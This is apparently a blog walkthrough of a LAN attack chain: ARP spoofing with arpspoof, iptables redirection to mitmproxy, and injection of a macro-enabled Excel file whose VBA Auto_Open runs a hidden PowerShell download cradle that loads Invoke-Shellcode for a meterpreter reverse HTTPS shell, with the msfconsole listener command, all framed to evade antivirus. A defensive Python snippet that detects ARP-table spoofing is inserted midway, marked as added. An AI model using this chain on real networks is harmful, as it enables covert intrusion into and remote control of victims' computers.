Malicious File Injection Technique

The idea with this particular attack is to inject a malicious file into the victim’s packet stream when they visit a non-https webpage.  For example, the default website for Internet Explorer is So, when the victim opens their web browser, we can (after a successful MiTM attack) inject our malicious file in hopes that they will run it.

Local LAN attack box: (Kali Linux)
Local LAN victim: (Windows 7 with IE 11, fully patched)
Public AWS server:
Internal AWS LAN IP:

Ideally, we want to remain undetected by AV, so we’ve embedded our malicious code in a macro-enabled Excel document.  If/when the victim runs the file and clicks to enable macros when prompted, a PowerShell command is executed that downloads Invoke-Shellcode (written by Matt Graeber) and runs it entirely within memory so as to continue to remain undetected by AV.

First, we need to craft our malicious Excel document.  This is covered in a separate post, but the basic VBA code looks like this:

Private Sub Auto_Open()
strCommand = "powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(' ');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost -Lport 8443"
Set WshShell = CreateObject("WScript.Shell")
Set WshShellExec = WshShell.Exec(strCommand)
End Sub

We also need a place to host our malicious file, which is seen below:


Next, we setup our metasploit listener, which is being done on an AWS box:

./msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST; set LPORT 8443; run"


AWS NAT rules to forward incoming 8443 traffic:


We now need to execute a MiTM attack on the victim. If we check the ARP table on our victim PC, we can see how it looks before ARP spoofing:


After running the following three commands on our local attack box, we’ll have successfully implemented our MiTM attack:

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t routerIP victimIP
arpspoof -i eth0 -t victimIP routerIP

Below is what we’ll see, on our local attack box:


If we look again at the victim PC, we can see the change to the ARP tables:


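The before/after ARP table comparison above is exactly what a host-side check can automate. The following Python example is added here and is not code from the original post; it parses constructed samples in the format of Windows `arp -a` output (addresses and MACs are made up) and flags a changed gateway MAC or one MAC answering for several IPs.

```python
import re
from typing import Dict, List

# Constructed sample `arp -a` output (Windows format) before and after the
# gateway entry was overwritten. All addresses and MACs are made up.
BEFORE = """
Interface: 192.0.2.10 --- 0xb
  Internet Address      Physical Address      Type
  192.0.2.1             00-50-56-aa-bb-01     dynamic
  192.0.2.20            00-50-56-aa-bb-02     dynamic
  192.0.2.255           ff-ff-ff-ff-ff-ff     static
"""
AFTER = """
Interface: 192.0.2.10 --- 0xb
  Internet Address      Physical Address      Type
  192.0.2.1             00-50-56-aa-bb-02     dynamic
  192.0.2.20            00-50-56-aa-bb-02     dynamic
  192.0.2.255           ff-ff-ff-ff-ff-ff     static
"""

# One table row: IPv4 address, dashed MAC, entry type.
ROW = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
                 r"([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(\w+)", re.I)

def parse_arp(text: str) -> Dict[str, str]:
    """Map IP -> MAC (lowercased), skipping broadcast and multicast rows."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # interface header, column header, blank line
        ip, mac = m.group(1), m.group(2).lower()
        if mac == "ff-ff-ff-ff-ff-ff" or int(ip.split(".")[0]) >= 224:
            continue
        table[ip] = mac
    return table

def arp_alerts(before: str, after: str, gateway: str) -> List[str]:
    """Alerts: gateway MAC changed, or one MAC now claimed by several IPs."""
    old, new = parse_arp(before), parse_arp(after)
    alerts: List[str] = []
    if gateway in old and gateway in new and old[gateway] != new[gateway]:
        alerts.append(f"gateway {gateway} MAC changed {old[gateway]} -> {new[gateway]}")
    by_mac: Dict[str, List[str]] = {}
    for ip, mac in new.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"MAC {mac} claimed by {', '.join(sorted(ips))}")
    return alerts
```

Feed the live output of `arp -a` in place of the constructed samples; a changed gateway MAC or a MAC shared between the gateway and another host is the signature of the spoofing shown above.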
Once the MiTM attack is fully in place, we can now execute the following two commands on our local attack box to proxy all traffic on port 80 to port 8080:

iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080

./mitmproxy -T -s ""

The first argument runs mitmproxy in transparent proxy mode so that we can view incoming traffic on port 8080.  The second argument runs a script that injects our macro-enabled Excel document into the victim’s web browser, hosted at AWS.


When the victim visits any non-https site (like, they should see something similar within their browser:


Within the mitmproxy console, we should see the injection:


When the file is opened by the victim, we should (hopefully) have our reverse shell.  Even when the victim closes Excel, the shell should persist.
